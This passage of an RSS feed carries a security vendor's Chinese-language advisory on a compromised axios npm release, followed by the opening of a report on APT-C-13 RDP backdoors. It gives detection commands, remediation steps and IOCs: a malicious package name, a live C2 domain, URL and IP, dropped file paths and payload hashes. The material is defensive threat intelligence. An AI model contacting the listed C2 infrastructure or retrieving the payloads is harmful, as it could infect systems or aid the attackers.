style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/dev/null</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg1t4p" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">find</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> . </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-path</span></span></span></span></span><span style="" mpa-font-style="mneec5rg13b1"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#39;*/node_modules/axios&#39;</span></span></span></span><span style="" mpa-font-style="mneec5rg107o"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-name</span></span></span></span><span style="" mpa-font-style="mneec5rg1jlq"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#39;package.json&#39; </span></span></span></span><span mpa-font-style="mneec5rg17e4" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-exec</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> grep </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-E </span></span></span></span></span><span mpa-font-style="mneec5rg6ac" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#39;1\.14\.1|0\.30\.4&#39;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> {} + </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/dev/null</span></span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt614n"><span style="" mpa-font-style="mneec5rg26"><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">（3）文件系统 IOC 扫描</span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt7tvc"><span style="" mpa-font-style="mneec5rg1ffb"><span style=""><span style="font-style: italic;font-variant: normal;text-transform: none;"><span leaf="">macOS/Linux 示例</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg15l5" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">find</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> /Library/Caches </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-name</span></span></span></span></span><span style="" mpa-font-style="mneec5rgaet"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;com.apple.act.mond&#34;</span></span></span></span><span mpa-font-style="mneec5rg13gy" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/dev/null</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rggkt" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">find</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> /tmp </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-name</span></span></span></span></span><span style="" mpa-font-style="mneec5rgym0"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;ld.py&#34; </span></span></span></span><span mpa-font-style="mneec5rg22ba" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2 </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/dev/null</span></span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt724hf"><span mpa-font-style="mneec5rga7a" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">（4）</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">Linux</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">网络 IOC 检查</span></span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004" data-mpa-action-id="mneiaodwleo" data-pm-slice="0 0 []"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneiaodj1y04"><span leaf="">ss -tup|grep -E &#39;sfrclak\.com|142\.11\.206\.73&#39;||  netstat -tup|grep -E &#39;sfrclak|142\.11&#39;</span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt7myo"><span mpa-font-style="mneec5rg1yjz" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">（5）检测后</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">的</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">处理建议</span></span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">如发现任何 IOC：立即隔离主机，保全证据，启动应急响应流程。</span></span></span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">清理建议（仅在完成取证后）：rm -rf node_modules package-lock.json &amp;&amp; npm install。</span></span></span></p></li></ul><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialt73p8"><span mpa-font-style="mneec5rgevc" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">5.3 </span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">轮换可能已失陷受影响的凭证</span></span></span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt7jkw"><span style="" mpa-font-style="mneec5rg16qi"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">所有接触过受影响环境的凭证必须立即轮换，包括：npm tokens、SSH 密钥、云平台凭证、GitHub PAT 等。建议启用 MFA，并收敛令牌权限与生命周期。</span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialt816z8"><span mpa-font-style="mneec5rga5k" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">5.4 </span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">对</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">CI/CD流程</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">进行安全防护加固</span></span></span></span></span></span></p></div></div><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt83z5"><span style="" mpa-font-style="mneec5rg20ie"><span style=""><span style="font-style: italic;font-variant: normal;text-transform: none;"><span leaf="">构建阶段忽略安装脚本（按需评估兼容性）</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span mpa-font-style="mneec5rg1z6e" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">npm</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> ci </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">--ignore-scripts</span></span></span></span></span></p></div></div></div><div data-role="outer" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div data-tools="135编辑器" data-id="101849" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 10px 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 0px 0px -15px;padding: 0px;display: flex;box-sizing:border-box;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-o-transform: rotate(0deg);"><p data-brushtype="text" style="margin: 0px;padding: 0px 1em;color: #f2f2f2;line-height: 32px;height: 32px;font-size: 16px;background-color: #be191f;letter-spacing: 1.5px;box-sizing: border-box;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;font-size: 17px;"><span leaf="">总结</span></span></strong></p></div><div style="margin: 0px 0px 0px 6px;padding: 30px 15px 10px;background-color: #f2f2f2;flex-shrink: 0;box-sizing: border-box;"><div data-autoskip="1" style="margin: 0px;padding: 0px;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;box-sizing: border-box;"><div style="margin: 0px;padding: 0px;text-indent: 2em;box-sizing: border-box;" data-mpa-action-id="mneinzh3yxj" data-pm-slice="0 0 []"><p style="margin-top: 8px;margin-bottom: 8px;display: block;" data-mpa-action-id="mneinxww10dd" data-pm-slice="0 0 []"><span style="color: rgb(51, 51, 51);text-align: justify;text-indent: 28px;text-decoration-thickness: initial;font-size: 17px;font-family: 仿宋;display: inline !important;"><span mpa-font-style="mneinxwe1cg5" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span mpa-font-style="mneinzgh5c2" style="font-size: 17px;"><span leaf="">本次事件再次印证：npm 供应链安全的核心脆弱点在于</span><span style="text-indent: 28px;text-decoration-thickness: initial;display: inline !important;"><span style="text-indent: 28px;text-decoration-thickness: initial;display: inline !important;"><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">维护者账号凭证</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">与 </span></span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">install 脚本默认可执行</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">。即使做到“零源码改动”，攻击者仍可通过依赖注入在构建/安装阶段实现高隐蔽性、跨平台的持久化控制。</span></span></span></span></span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt89bq" data-mpa-action-id="mneinxwws1a"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;" mpa-font-style="mneinzghdjq"><span style="font-variant: normal;text-transform: none;"><span leaf="">360建议所有使用 Axios 的团队落实“零信任依赖”原则：</span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;margin-top: 8px;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneinzgh1pjn" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;"><span style="font-variant: normal;text-transform: none;"><span leaf="">版本锁定与锁文件强制</span></span></span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;margin-top: 8px;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneinzgh1gid" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;"><span style="font-variant: normal;text-transform: none;"><span leaf="">构建阶段最小化脚本执行（必要时 --ignore-scripts）</span></span></span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;margin-top: 8px;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneinzghzsi" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;"><span style="font-variant: normal;text-transform: none;"><span leaf="">持续依赖安全扫描与供应链监测</span></span></span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;margin-top: 8px;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rghqj" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="" mpa-font-style="mneinzghgws" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;">凭证最小权限、短周期与强 MFA</span></span></span></p></li></ul></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mneetjp5kwz"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="edit by 135editor" mpa-from-tpl="t"><div data-role="title" data-tools="135编辑器" data-id="85638" mpa-from-tpl="t"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);" mpa-from-tpl="t"><p style="margin-top: -1.2em;text-align: center;border: none;line-height: 1.4;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;" mpa-is-content="t"><span leaf="">附录 IOCs</span></span></strong></p></div></div></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt8125v"><span mpa-font-style="mneec5rg10ev" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="" mpa-font-style="mnehi09i1tl8" style="">•</span></span><span mpa-font-style="mnehi09i1van" style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">恶意包名称</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt8hlb"><span mpa-font-style="mnehi09ih3y" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">plain-crypto-js@4[.]2.1</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt91rep"><span mpa-font-style="mnehi09i9hi" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">axios@1[.]14.1</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt91toz"><span mpa-font-style="mnehi09icdb" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">axios@0[.]30.4</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt9ibq"><span mpa-font-style="mnehi09i926" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">C2 基础设施</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt922ln"><span mpa-font-style="mnehi09irzu" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">sfrclak[.]com:8000</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt9o3u"><span mpa-font-style="mnehi09icnw" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><a href="http://sfrclak[.]com:8000/6202033" target="_blank">http://sfrclak[.]com:8000/6202033</a></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt9wv1"><span mpa-font-style="mnehi09i13vx" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">142.11.206[.]73</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt96dd"><span mpa-font-style="mnehi09i1934" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">典型文件路径</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><ul style="list-style-type:square;padding-left:1.2em;color:rgb(37, 37, 37);width:fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">macOS：</span></span></span></p></li></ul></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt99fd"><span mpa-font-style="mnehi09i1szv" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">    /Library/Caches/com[.]apple.act.mond</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt9vhh"><span mpa-font-style="mnehi09ig00" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">    $TMPDIR/6202033</span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><ul style="list-style-type:square;padding-left:1.2em;color:rgb(37, 37, 37);width:fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">Windows：</span></span></span></p></li></ul></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt94l2"><span mpa-font-style="mnehi09iz57" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">    %PROGRAMDATA%\wt[.]exe</span></span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><ul style="list-style-type:square;padding-left:1.2em;color:rgb(37, 37, 37);width:fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">Linux：</span></span></span></p></li></ul></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt98h5"><span mpa-font-style="mnehi09i1plz" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">    /tmp/ld[.]py</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialtap7e"><span mpa-font-style="mnehi09idqv" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">Windows</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf=""> Payload SHA256</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialta1wf4"><span mpa-font-style="mnehi09i1jsi" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialta1syp"><span mpa-font-style="mnehi09i1fer" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">macOS Payload SHA256</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialtaym6"><span mpa-font-style="mneex3ng1fsm" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="" mpa-font-style="mnehi09i1u70" style="">92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</span></span></span></span></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c5cf23fa&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508054%26idx%3D1%26sn%3D53087fd771552eb8c5c0144dc7db8400">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 31 Mar 2026 19:21:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-13（沙虫）RDP后门攻击活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508035&amp;idx=1&amp;sn=4d58712823b2121714adf4edbea69f60</link>
      <description>APT-C-13组织近期正利用其深度迭代的模块化渗透框架——Tambur/Sumbur/Kalambur系列，开展高强度的定向攻击</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-03-24 17:27</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=eba9f360&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEmmib7pWXrXKmPfF9HttIZb9k3zp91Wu6qicvDibyKA6WO6hAHywmqg8kkUsaKic3kib1deB7N7PeZBt4W9lHVQguKcUhBpEdrP0dpQsy9APAZibA%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>APT-C-13组织近期正利用其深度迭代的模块化渗透框架——Tambur/Sumbur/Kalambur系列，开展高强度的定向攻击</p>
  <div style="padding: 0 8px;" data-mpa-md-root="t" data-mpa-uuid="1b45f7baa2d01eb8541e9d7ce0489590" data-mpa-apply-md="t" data-mpa-action-id="mn31ispi1kst" data-pm-slice="0 0 []"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmx68qvb1o4t"><div style="margin: 10px auto;" mpa-from-tpl="t"><div style="background: #f2f2f2;" mpa-from-tpl="t"><div style="padding: 1em;" mpa-from-tpl="t"><div style="display: flex;justify-content: space-between;align-items: flex-end;" hm_fix="312:231" mpa-from-tpl="t"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);" mpa-from-tpl="t"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;" mpa-from-tpl="t"><span style="font-size: 18px;"><strong mpa-from-tpl="t"><span leaf="">APT-C-13</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;" mpa-from-tpl="t"><span style="font-size: 18px;"><strong mpa-from-tpl="t"><span leaf="">沙虫</span></strong></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;color: rgb(0, 0, 0);margin-top: 20px;" mpa-from-tpl="t" data-mpa-action-id="mn31i3mcr4" data-pm-slice="0 0 []"><p style="text-align:justify;vertical-align: inherit;clear: both;color: rgb(51, 51, 51);text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;"><span style="line-height: 18.4px;"><span leaf="" mpa-font-style="mn31i3ltxzk" style="font-size: 